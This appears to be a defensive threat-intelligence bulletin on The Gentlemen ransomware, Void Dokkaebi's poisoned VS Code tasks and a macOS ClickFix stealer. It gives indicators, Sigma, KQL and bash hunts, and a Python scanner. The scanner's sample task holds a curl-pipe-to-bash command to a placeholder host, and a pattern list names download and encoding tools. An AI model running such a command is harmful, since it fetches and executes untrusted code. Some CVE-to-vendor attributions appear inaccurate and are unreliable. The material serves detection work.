Recent OTX pulses reveal a convergence of high-impact threats targeting enterprise infrastructure, software supply chains, and endpoint platforms. The Gentlemen, a sophisticated RaaS operation, is actively exploiting vulnerabilities in FortiOS and VMware environments (CVE-2024-37085, CVE-2024-55591) to deploy LockBit 5.0, Medusa, and Babuk variants. Simultaneously, the North Korea-aligned Void Dokkaebi (WageMole) group has refined its social engineering tactics, using fake job interviews to distribute malicious VS Code tasks via poisoned Git repositories, facilitating the spread of DEV#POPPER RAT and BeaverTail. Separately, a macOS ClickFix campaign is utilizing fake CAPTCHA pages to trick users into running AppleScript stealers capable of exfiltrating data from over 200 browser extensions and 16 cryptocurrency wallets. Collectively, these pulses highlight a shift toward multi-vector exploitation combining CVE abuse, developer-centric supply chain attacks, and cross-platform social engineering.
Threat Actor / Malware Profile
The Gentlemen (RaaS)
- Profile: A ransomware-as-a-service group utilizing a database of compromised devices to facilitate initial access.
- Malware Families: LockBit 5.0, Medusa, Babuk (Babyk), Vasa Locker, Qilin.
- TTPs: Exploits public-facing applications (FortiOS/FortiProxy), leverages CVE-2024-37085 for VMware ESXi escape, and employs extensive defense evasion.
Void Dokkaebi (Famous Chollima / WageMole)
- Profile: Nation-state actor targeting the technology and blockchain sectors.
- Malware Families: DEV#POPPER RAT, InvisibleFerret, OtterCookie, OmniStealer, BeaverTail.
- Distribution: Supply chain attack via malicious npm/Git repositories; lures involve fake job interviews for developers.
- Mechanism: Modifies the VS Code tasks file so that malicious commands execute automatically when the project is opened, creating a worm-like propagation effect.
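As an added example (not code from the original page or the OTX pulses), the following Python script audits a repository checkout for tasks that VS Code runs without user interaction. It relies on the standard VS Code task schema, where `runOptions.runOn` set to `folderOpen` makes a task start when the folder is opened, and on the standard file location `.vscode/tasks.json`; the sample document and the suspect-pattern list are constructed for illustration.

```python
import json
import os
import re

# Command fragments that make an auto-run task worth a human look (constructed list, not exhaustive).
SUSPECT_PATTERNS = [r"\bcurl\b", r"\bwget\b", r"\bbase64\b", r"powershell",
                    r"\bosascript\b", r"\biex\b", r"\bnode\s+-e\b", r"\bpython3?\s+-c\b"]

# Constructed sample: one ordinary build task and one folderOpen task of the kind described above.
SAMPLE_TASKS = r'''{
  // tasks files may carry comments, so plain json.loads would fail here
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "runOptions": {"runOn": "folderOpen"},
     "command": "curl -fsSL http://example.invalid/setup | bash"}
  ]
}'''

def strip_json_comments(text: str) -> str:
    """Drop /* */ blocks and full-line // comments (simplified JSONC handling; inline // is kept so URLs survive)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    return "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("//"))

def task_command(task: dict) -> str:
    """Join command and args into one string; args may be plain strings or {value, quoting} objects."""
    args = [str(a.get("value", "")) if isinstance(a, dict) else str(a) for a in task.get("args", [])]
    return " ".join([str(task.get("command", ""))] + args)

def find_autorun_tasks(doc_text: str) -> list:
    """Return every task with runOptions.runOn == "folderOpen", with the suspect patterns its command matches."""
    doc = json.loads(strip_json_comments(doc_text))
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command(task)
        hits = [p for p in SUSPECT_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd, "suspect": hits})
    return findings

def scan_tree(root: str) -> list:
    """Walk a checkout and audit each .vscode/tasks.json (the standard VS Code task file location)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                findings += [{"path": path, **f} for f in find_autorun_tasks(fh.read())]
    return findings
```

Run `scan_tree` over a checkout before opening it in the editor; any finding with a non-empty `suspect` list deserves review before the folder is trusted.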
macOS ClickFix (Unknown Actor)
- Profile: Financially motivated infostealer operation.
- Target: macOS and Windows users.
- Mechanism: "ClickFix" social engineering; fake CAPTCHA pages prompt users to copy/paste and execute malicious commands into Terminal or PowerShell.
- Payload: AppleScript-based infostealer targeting Keychain, browser cookies (Chrome, Firefox, Safari, Edge, Brave, etc.), and crypto wallets.
IOC Analysis
The provided IOCs span network infrastructure, file artifacts, and vulnerability identifiers:
- IPv4 Addresses: The Void Dokkaebi pulse lists multiple C2 IPs (e.g., 166.88.4.2, 85.239.62.36, 23.27.20.143). The macOS ClickFix campaign uses 172.94.9.250. SOC teams should immediately block these at perimeter firewalls and in EDR.
- Domains: bull-run.fun and spot-wave.fun are associated with the ClickFix campaign's fake CAPTCHA infrastructure. These should be added to DNS sinkholes.
- CVEs: The Gentlemen are exploiting CVE-2024-37085 (VMware), CVE-2024-55591, and CVE-2025-32463 (Fortinet). Vulnerability management must prioritize patching these specific vulnerabilities.
- File Hashes: Multiple MD5, SHA1, and SHA256 hashes are provided for payloads (e.g., 3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235). These should be loaded into EDR detection rules and SIEM correlation engines.
Detection Engineering
```yaml
title: VS Code Task Execution via Anomalous Processes
id: 3ab95752-2026-0001
description: Detects shells spawned by VS Code, as happens when a malicious VS Code task runs; indicative of the Void Dokkaebi supply chain attack.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6624c8221c44997927e8fa72/
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|contains: '\Code.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\bash.exe'
  condition: selection
falsepositives:
  - Legitimate developer build scripts
  - VS Code integrated terminal sessions, which also spawn shells under Code.exe
level: high
---
title: macOS ClickFix AppleScript Execution Pattern
description: Detects execution of osascript with base64 encoded arguments or suspicious keychain access, associated with ClickFix campaigns.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6624c8221c44997927e8fa72/
tags:
  - attack.execution
  - attack.t1059.002
logsource:
  category: process_creation
  product: macos
detection:
  selection_osascript:
    Image|endswith: '/osascript'
    CommandLine|contains: '-e'
  selection_encoded:
    CommandLine|contains: 'base64'
  selection_keychain:
    CommandLine|contains: 'security find-generic-password'
  # osascript must be the process; either indicator then qualifies (a bare "1 of selection*"
  # would fire on any process whose command line merely contains "base64")
  condition: selection_osascript and (selection_encoded or selection_keychain)
falsepositives:
  - Legitimate administrative scripts
level: critical
---
title: Network Connection to Void Dokkaebi C2 Infrastructure
id: 3ab95752-2026-0003
description: Detects network connections to known Void Dokkaebi C2 IPs associated with DEV#POPPER RAT.
status: experimental
date: 2026/04/21
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6624c8221c44997927e8fa72/
tags:
  - attack.command_and_control
  - attack.t1071
logsource:
  category: network_connection
detection:
  selection:
    # exact match rather than |contains, so that 166.88.4.2 does not also match 166.88.4.20
    DestinationIp:
      - '166.88.4.2'
      - '85.239.62.36'
      - '23.27.20.143'
      - '23.27.202.27'
      - '154.91.0.196'
  condition: selection
level: critical
```
```kql
// Hunt for Void Dokkaebi and ClickFix network activity
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("166.88.4.2", "85.239.62.36", "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196", "198.105.127.210", "83.168.68.219", "172.94.9.250")
    or RemoteUrl has_any ("bull-run.fun", "spot-wave.fun")
// 172.94.9.250 belongs to the ClickFix campaign, so label it with the ClickFix domains rather than as Void Dokkaebi C2
| extend ThreatCategory = iif(RemoteUrl has_any ("bull-run", "spot-wave") or RemoteIP == "172.94.9.250", "macOS ClickFix", "Void Dokkaebi C2")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteUrl, ThreatCategory
```
```bash
#!/bin/bash
# Hunt for Void Dokkaebi VS Code task persistence
# Flags VS Code tasks files under any .vscode directory that changed in the last 24 hours
echo "[+] Scanning for suspicious VS Code task modifications..."
now=$(date +%s)
find /home -type d -name ".vscode" 2>/dev/null | while read -r dir; do
    for tasks_file in "$dir"/tasks.*; do
        [ -f "$tasks_file" ] || continue
        # stat -c %Y is GNU coreutils: modification time in seconds since the epoch
        mtime=$(stat -c %Y "$tasks_file")
        if [ $((now - mtime)) -lt 86400 ]; then
            echo "[!] Recently modified VS Code tasks file found: $tasks_file"
            echo "Content preview:"
            head -n 20 "$tasks_file"
        fi
    done
done
echo "[+] Checking hosts file for ClickFix domains..."
if grep -qE "bull-run\.fun|spot-wave\.fun" /etc/hosts; then
    echo "[!] Suspicious domains found in /etc/hosts"
else
    echo "[-] No suspicious domains in /etc/hosts"
fi
```
Response Priorities
Immediate (0-24h)
- Blocking: Block all listed Void Dokkaebi IPv4 addresses and ClickFix domains (bull-run.fun, spot-wave.fun) at the perimeter and proxy level.
- Hunting: Deploy the provided Sigma rules to hunt for VS Code spawning shells and macOS osascript activity.
- Patching: Emergency patch validation for CVE-2024-37085 (VMware ESXi) and CVE-2024-55591/CVE-2025-32463 (Fortinet).
Short-term (24-48h)
- Identity Verification: If credential stealing malware (OmniStealer, AppleScript stealers) is suspected, force-reset passwords for developers and privileged users who may have interacted with the fake job lures.
- Repository Audit: Scan internal Git repositories and CI/CD pipelines for the malicious packages or VS Code task configurations associated with Void Dokkaebi.
Long-term (1 Week)
- Architecture Hardening: Implement strict controls on VS Code task execution and enforce "require signed tasks" policies where possible.
- Training: Update security awareness training to include specific examples of the "fake job interview" supply chain lure and "ClickFix" fake CAPTCHA mechanics.